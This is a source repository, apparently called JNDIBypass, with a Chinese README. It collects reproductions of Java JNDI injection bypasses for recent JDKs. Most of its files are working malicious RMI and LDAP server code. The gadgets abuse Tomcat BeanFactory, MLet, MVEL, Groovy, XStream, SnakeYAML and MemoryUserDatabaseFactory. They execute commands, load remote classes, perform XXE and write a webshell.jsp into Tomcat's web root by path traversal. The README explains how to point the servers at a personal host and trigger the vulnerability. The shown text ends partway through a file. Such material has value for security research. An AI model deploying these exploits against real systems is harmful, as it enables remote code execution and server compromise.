├── org.yaml.snakeyaml.Yaml
    ├── src
    │   └── main
    │   │   ├── resources
    │   │       └── META-INF
    │   │       │   └── services
    │   │       │       └── javax.script.ScriptEngineFactory
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               ├── YamlServer.java
    │   │               └── File.java
    └── pom.xml
├── images
    ├── image-20240320225859934.png
    ├── image-20240320230209513.png
    ├── image-20240320230358272.png
    ├── image-20240320230449772.png
    └── image-20240320230541986.png
├── com.sun.glass.utils.NativeLibLoader
    ├── src
    │   └── main
    │   │   ├── resources
    │   │       └── META-INF
    │   │       │   └── MANIFEST.MF
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               └── NativeLibLoaderServer.java
    ├── target
    │   └── classes
    │   │   └── org
    │   │       └── example
    │   │           ├── JNDITest.class
    │   │           └── NativeLibLoaderServer.class
    └── pom.xml
├── .idea
    ├── .gitignore
    ├── vcs.xml
    ├── modules.xml
    ├── JNDIBypass.iml
    ├── jarRepositories.xml
    ├── compiler.xml
    ├── misc.xml
    ├── encodings.xml
    ├── artifacts
    │   ├── org_yaml_snakeyaml_Yaml_jar.xml
    │   └── org_apache_naming_factory_BeanFactory_jar.xml
    └── uiDesigner.xml
├── javax.management.loading.MLet
    ├── target
    │   └── classes
    │   │   └── org
    │   │       └── example
    │   │           ├── JNDITest.class
    │   │           └── MletServer.class
    ├── src
    │   └── main
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               └── MletServer.java
    └── pom.xml
├── ByUnserialize
    ├── src
    │   └── main
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               └── UnserializeLDAPServer.java
    └── pom.xml
├── org.apache.naming.factory.BeanFactory
    ├── src
    │   └── main
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               └── TomcatBeanFactoryServer.java
    └── pom.xml
├── org.mvel2.sh.ShellSession.exec
    ├── src
    │   └── main
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               └── MvelServer.java
    └── pom.xml
├── com.thoughtworks.xstream.XStream.fromXML
    ├── src
    │   └── main
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               └── XstreamServer.java
    └── pom.xml
├── groovy.lang.GroovyClassLoader.parseClass
    ├── src
    │   └── main
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest.java
    │   │               └── GroovyShellServer.java
    └── pom.xml
├── org.apache.catalina.users.MemoryUserDatabaseFactory
    ├── src
    │   └── main
    │   │   └── java
    │   │       └── org
    │   │           └── example
    │   │               ├── JNDITest_XXEServer.java
    │   │               ├── XXEServer.java
    │   │               ├── UserDataRCE_Server_windows.java
    │   │               └── UserDataRCE_Server_linux.java
    └── pom.xml
└── README.md


/org.yaml.snakeyaml.Yaml/src/main/resources/META-INF/services/javax.script.ScriptEngineFactory:
--------------------------------------------------------------------------------
1 | org.example.File


--------------------------------------------------------------------------------
/images/image-20240320225859934.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320225859934.png


--------------------------------------------------------------------------------
/images/image-20240320230209513.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230209513.png


--------------------------------------------------------------------------------
/images/image-20240320230358272.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230358272.png


--------------------------------------------------------------------------------
/images/image-20240320230449772.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230449772.png


--------------------------------------------------------------------------------
/images/image-20240320230541986.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/images/image-20240320230541986.png


--------------------------------------------------------------------------------
/com.sun.glass.utils.NativeLibLoader/src/main/resources/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: org.example.TomcatBeanFactoryServer
3 | 
4 | 


--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 | 


--------------------------------------------------------------------------------
/javax.management.loading.MLet/target/classes/org/example/JNDITest.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/javax.management.loading.MLet/target/classes/org/example/JNDITest.class


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/javax.management.loading.MLet/target/classes/org/example/MletServer.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/javax.management.loading.MLet/target/classes/org/example/MletServer.class


--------------------------------------------------------------------------------
/com.sun.glass.utils.NativeLibLoader/target/classes/org/example/JNDITest.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/com.sun.glass.utils.NativeLibLoader/target/classes/org/example/JNDITest.class


--------------------------------------------------------------------------------
/com.sun.glass.utils.NativeLibLoader/target/classes/org/example/NativeLibLoaderServer.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LtmThink/JNDIBypass/HEAD/com.sun.glass.utils.NativeLibLoader/target/classes/org/example/NativeLibLoaderServer.class


--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/JNDIBypass.iml" filepath="$PROJECT_DIR$/.idea/JNDIBypass.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/.idea/JNDIBypass.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="JAVA_MODULE" version="4">
3 |   <component name="NewModuleRootManager" inherit-compiler-output="true">
4 |     <exclude-output />
5 |     <content url="file://$MODULE_DIR$" />
6 |     <orderEntry type="inheritedJdk" />
7 |     <orderEntry type="sourceFolder" forTests="false" />
8 |   </component>
9 | </module>


--------------------------------------------------------------------------------
/ByUnserialize/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws Exception {
 9 |         Object object=new InitialContext().lookup("ldap://127.0.0.1:4444/dc=example,dc=com");
10 |     }
11 | 
12 | }
13 | 
14 | 


--------------------------------------------------------------------------------
/org.yaml.snakeyaml.Yaml/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/yaml";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/javax.management.loading.MLet/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/melt";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/org.apache.naming.factory.BeanFactory/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/Exploit";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }


--------------------------------------------------------------------------------
/org.mvel2.sh.ShellSession.exec/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/mvel";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/com.sun.glass.utils.NativeLibLoader/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/dllLoader";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/com.thoughtworks.xstream.XStream.fromXML/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/FromXML";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/groovy.lang.GroovyClassLoader.parseClass/src/main/java/org/example/JNDITest.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/evilGroovy";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/JNDITest_XXEServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | 
 4 | import javax.naming.InitialContext;
 5 | import javax.naming.NamingException;
 6 | 
 7 | public class JNDITest_XXEServer {
 8 |     public static void main(String[] args) throws NamingException {
 9 |         String uri = "rmi://127.0.0.1:1100/xxe";
10 |         InitialContext initialContext = new InitialContext();
11 |         initialContext.lookup(uri);
12 |     }
13 | 
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/com.sun.glass.utils.NativeLibLoader/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>com.sun.glass.utils.NativeLibLoader</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 |     <dependencies>
11 |         <dependency>
12 |             <groupId>org.apache.tomcat</groupId>
13 |             <artifactId>tomcat-catalina</artifactId>
14 |             <version>9.0.8</version>
15 |         </dependency>
16 |     </dependencies>
17 | 
18 | 
19 | </project>


--------------------------------------------------------------------------------
/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="RemoteRepositoriesConfiguration">
 4 |     <remote-repository>
 5 |       <option name="id" value="central" />
 6 |       <option name="name" value="Maven Central repository" />
 7 |       <option name="url" value="https://repo1.maven.org/maven2" />
 8 |     </remote-repository>
 9 |     <remote-repository>
10 |       <option name="id" value="central" />
11 |       <option name="name" value="Central Repository" />
12 |       <option name="url" value="http://maven.aliyun.com/nexus/content/groups/public" />
13 |     </remote-repository>
14 |     <remote-repository>
15 |       <option name="id" value="jboss.community" />
16 |       <option name="name" value="JBoss Community repository" />
17 |       <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
18 |     </remote-repository>
19 |   </component>
20 | </project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # JNDIBypass
 2 | 高版本java各种JNDI Bypass方法复现+相应RMI服务端代码
 3 | 
 4 | 关于本仓库所有的绕过方法复现使用可以看我的这篇[博客](https://ltmthink.github.io/2024/03/18/JNDIBypass/)
 5 | 
 6 | 所有的复现都是基于[这篇文章](https://www.cnblogs.com/bitterz/p/15946406.html#11-%E6%80%9D%E8%B7%AF%E4%B8%80%E7%9A%84%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90),想要详细了解原理的可以去查看
 7 | 
 8 | #### 将相关源码利于与远程服务端示例
 9 | 
10 | 以org.apache.naming.factory.BeanFactory这个类为例,进入相关目录找到相应服务端的代码
11 | 
12 | ![image-20240320225859934](images/image-20240320225859934.png)
13 | 
14 | 然后将所有的127.0.0.1修改为个人服务器的ip
15 | 
16 | 构建工件获得相应jar包
17 | 
18 | ![image-20240320230209513](images/image-20240320230209513.png)
19 | 
20 | 将相应jar包上传至个人服务器,并使用`java -jar xxxx.jar`运行
21 | 
22 | ![image-20240320230358272](images/image-20240320230358272.png)
23 | 
24 | 修改对应JNDITest.java文件内的ip地址
25 | 
26 | ![image-20240320230449772](images/image-20240320230449772.png)
27 | 
28 | 运行JNDITest.jar即可触发JNDI漏洞弹出计算机
29 | 
30 | ![image-20240320230541986](images/image-20240320230541986.png)
31 | 


--------------------------------------------------------------------------------
/javax.management.loading.MLet/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>javax.management.loading.MLet</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>org.apache.tomcat</groupId>
19 |             <artifactId>tomcat-catalina</artifactId>
20 |             <version>9.0.8</version>
21 |         </dependency>
22 |     </dependencies>
23 | 
24 | </project>


--------------------------------------------------------------------------------
/org.apache.catalina.users.MemoryUserDatabaseFactory/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>org.apache.catalina.users.MemoryUserDatabaseFactory</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>org.apache.tomcat</groupId>
19 |             <artifactId>tomcat-catalina</artifactId>
20 |             <version>9.0.8</version>
21 |         </dependency>
22 |     </dependencies>
23 | 
24 | </project>


--------------------------------------------------------------------------------
/org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/XXEServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class XXEServer {
11 |     public static void main(String[] args) throws Exception {
12 |         System.out.println("Creating evil RMI registry on port 1100");
13 |         Registry registry = LocateRegistry.createRegistry(1100);
14 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
15 | 
16 |         ResourceRef ref = new ResourceRef("org.apache.catalina.UserDatabase", null, "", "", true,"org.apache.catalina.users.MemoryUserDatabaseFactory",null);
17 |         ref.add(new StringRefAddr("pathname","http://127.0.0.1:7777/exp.xml"));
18 | 
19 |         ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
20 |         registry.bind("xxe", referenceWrapper);
21 |     }
22 | }
23 | 


--------------------------------------------------------------------------------
/.idea/compiler.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="CompilerConfiguration">
 4 |     <annotationProcessing>
 5 |       <profile name="Maven default annotation processors profile" enabled="true">
 6 |         <sourceOutputDir name="target/generated-sources/annotations" />
 7 |         <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
 8 |         <outputRelativeToContentRoot value="true" />
 9 |         <module name="org.apache.naming.factory.BeanFactory" />
10 |         <module name="javax.management.loading.MLet" />
11 |         <module name="com.sun.glass.utils.NativeLibLoader" />
12 |         <module name="org.apache.catalina.users.MemoryUserDatabaseFactory" />
13 |         <module name="groovy.lang.GroovyClassLoader.parseClass" />
14 |         <module name="com.thoughtworks.xstream.XStream.fromXML" />
15 |         <module name="org.mvel2.sh.ShellSession.exec" />
16 |         <module name="ByUnserialize" />
17 |         <module name="org.yaml.snakeyaml.Yaml" />
18 |       </profile>
19 |     </annotationProcessing>
20 |   </component>
21 | </project>


--------------------------------------------------------------------------------
/org.yaml.snakeyaml.Yaml/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>org.yaml.snakeyaml.Yaml</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>org.apache.tomcat</groupId>
19 |             <artifactId>tomcat-catalina</artifactId>
20 |             <version>9.0.8</version>
21 |         </dependency>
22 |         <dependency>
23 |             <groupId>org.yaml</groupId>
24 |             <artifactId>snakeyaml</artifactId>
25 |             <version>1.33</version>
26 |         </dependency>
27 |     </dependencies>
28 | 
29 | </project>


--------------------------------------------------------------------------------
/org.mvel2.sh.ShellSession.exec/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>org.mvel2.sh.ShellSession.exec</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>org.apache.tomcat</groupId>
19 |             <artifactId>tomcat-catalina</artifactId>
20 |             <version>9.0.8</version>
21 |         </dependency>
22 |         <dependency>
23 |             <groupId>org.mvel</groupId>
24 |             <artifactId>mvel2</artifactId>
25 |             <version>2.4.12.Final</version>
26 |         </dependency>
27 |     </dependencies>
28 | </project>


--------------------------------------------------------------------------------
/org.apache.catalina.users.MemoryUserDatabaseFactory/src/main/java/org/example/UserDataRCE_Server_windows.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class UserDataRCE_Server_windows {
11 |     public static void main(String[] args) throws Exception{
12 |         System.out.println("Creating evil RMI registry on port 1100");
13 |         Registry registry = LocateRegistry.createRegistry(1100);
14 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
15 | 
16 |         ResourceRef ref = new ResourceRef("org.apache.catalina.UserDatabase", null, "", "",
17 |                 true, "org.apache.catalina.users.MemoryUserDatabaseFactory", null);
18 |         ref.add(new StringRefAddr("pathname", "http://127.0.0.1:7777/../../webapps/ROOT/webshell.jsp"));
19 |         ref.add(new StringRefAddr("readonly", "false"));
20 | 
21 |         ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
22 |         registry.bind("writeFile", referenceWrapper);
23 |     }
24 | }
25 | 


--------------------------------------------------------------------------------
/groovy.lang.GroovyClassLoader.parseClass/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>groovy.lang.GroovyClassLoader.parseClass</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>org.codehaus.groovy</groupId>
19 |             <artifactId>groovy</artifactId>
20 |             <version>2.4.3</version>
21 |         </dependency>
22 |         <dependency>
23 |             <groupId>org.apache.tomcat</groupId>
24 |             <artifactId>tomcat-catalina</artifactId>
25 |             <version>9.0.8</version>
26 |         </dependency>
27 |     </dependencies>
28 | 
29 | </project>


--------------------------------------------------------------------------------
/com.thoughtworks.xstream.XStream.fromXML/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>com.thoughtworks.xstream.XStream.fromXML</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>org.apache.tomcat</groupId>
19 |             <artifactId>tomcat-catalina</artifactId>
20 |             <version>9.0.8</version>
21 |         </dependency>
22 |         <dependency>
23 |             <groupId>com.thoughtworks.xstream</groupId>
24 |             <artifactId>xstream</artifactId>
25 |             <version>1.4.6</version>
26 |         </dependency>
27 |     </dependencies>
28 | 
29 | </project>


--------------------------------------------------------------------------------
/javax.management.loading.MLet/src/main/java/org/example/MletServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class MletServer {
11 |     public static void main(String[] args) throws Exception {
12 |         System.out.println("Creating evil RMI registry on port 1100");
13 |         Registry registry = LocateRegistry.createRegistry(1100);
14 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
15 |         ResourceRef ref = new ResourceRef("javax.management.loading.MLet", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
16 |         ref.add(new StringRefAddr("forceString", "a=loadClass,b=addURL,c=loadClass"));
17 |         ref.add(new StringRefAddr("a","java.lang.Runtime"));
18 |         ref.add(new StringRefAddr("b","http://127.0.0.1:2333/"));
19 |         ref.add(new StringRefAddr("c","Bitterz"));
20 | 
21 |         ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
22 |         registry.bind("melt", referenceWrapper);
23 |     }
24 | }
25 | 


--------------------------------------------------------------------------------
/org.mvel2.sh.ShellSession.exec/src/main/java/org/example/MvelServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class MvelServer {
11 |     public static void main(String[] args) throws Exception {
12 |         Registry registry = LocateRegistry.createRegistry(1100);
13 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
14 |         // 实例化Reference，指定目标类为javax.el.ELProcessor，工厂类为org.apache.naming.factory.BeanFactory
15 |         ResourceRef ref = new ResourceRef("org.mvel2.sh.ShellSession", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
16 | 
17 |         // 强制将 'x' 属性的setter 从 'setX' 变为 'eval', 详细逻辑见 BeanFactory.getObjectInstance 代码
18 |         ref.add(new StringRefAddr("forceString", "a=exec"));
19 |         ref.add(new StringRefAddr("a", "push Runtime.getRuntime().exec('calc');"));
20 | 
21 | 
22 |         ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
23 |         registry.bind("mvel", referenceWrapper);  // 绑定目录名
24 |         System.out.println("Server Start on 1100...");
25 |     }
26 | }
27 | 


--------------------------------------------------------------------------------
/ByUnserialize/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>ByUnserialize</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <properties>
12 |         <maven.compiler.source>8</maven.compiler.source>
13 |         <maven.compiler.target>8</maven.compiler.target>
14 |         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
15 |     </properties>
16 |     <dependencies>
17 |         <dependency>
18 |             <groupId>com.unboundid</groupId>
19 |             <artifactId>unboundid-ldapsdk</artifactId>
20 |             <version>3.2.0</version>
21 |         </dependency>
22 |         <!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
23 |         <dependency>
24 |             <groupId>commons-collections</groupId>
25 |             <artifactId>commons-collections</artifactId>
26 |             <version>3.2.1</version>
27 |         </dependency>
28 | 
29 |     </dependencies>
30 | 
31 | </project>


--------------------------------------------------------------------------------
/org.yaml.snakeyaml.Yaml/src/main/java/org/example/YamlServer.java:
--------------------------------------------------------------------------------
 1 | package org.example;
 2 | 
 3 | import com.sun.jndi.rmi.registry.ReferenceWrapper;
 4 | import org.apache.naming.ResourceRef;
 5 | 
 6 | import javax.naming.StringRefAddr;
 7 | import java.rmi.registry.LocateRegistry;
 8 | import java.rmi.registry.Registry;
 9 | 
10 | public class YamlServer {
11 |     public static void main(String[] args) throws Exception {
12 |         Registry registry = LocateRegistry.createRegistry(1100);
13 |         System.setProperty("java.rmi.server.hostname", "127.0.0.1");
14 | 
